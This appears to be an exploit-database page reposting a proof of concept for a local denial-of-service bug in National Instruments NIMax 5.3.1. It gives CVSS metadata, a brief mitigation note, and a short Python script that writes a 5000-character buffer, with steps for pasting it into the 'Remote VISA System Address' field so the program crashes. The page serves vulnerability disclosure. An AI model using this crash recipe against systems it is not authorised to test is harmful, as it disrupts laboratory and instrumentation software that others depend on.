header-logo
Suggest Exploit
vendor:
NIMax
by:
LinxzSec
7.5
CVSS
HIGH
Local Denial of Service (DoS)
CWE
Product Name: NIMax
Affected Version From: 5.3.2001
Affected Version To: 5.3.2001
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro x64
2021

NIMax 5.3.1 – ‘Remote VISA System’ Denial of Service (PoC)

The NIMax software version 5.3.1 is vulnerable to a local Denial of Service (DoS) attack. By creating a specially crafted file, an attacker can cause the NIMax application to crash, resulting in a denial of service condition.

Mitigation:

No official patch or mitigation is available at the time of this writing. It is recommended to restrict access to the vulnerable software and monitor for any unusual activity.
Source

Exploit-DB raw data:

# Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)
# Date: 24/06/2021
# Exploit Author: LinxzSec
# Vulnerability: Local Denial of Service (DoS)
# Vendor Homepage: https://www.ni.com/en-gb.html
# Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
# Tested Version: 5.3.1f0
# Tested On: Windows 10 Pro x64

'''[ POC ]
1 - Copy printed "AAAAA..." string from "nimax.txt"
2 - Open NIMax.exe
3 - Right click "Remote systems" and press "Create New"
4 - Select "Remote VISA System" and press "Next"
5 - Paste clipboard in "Remote VISA System Address"
6 - Press finish and DoS will occur
'''

buffer = "\x41" * 5000

try:
    f = open("nimax.txt", "w")
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("[+] File could not be created!")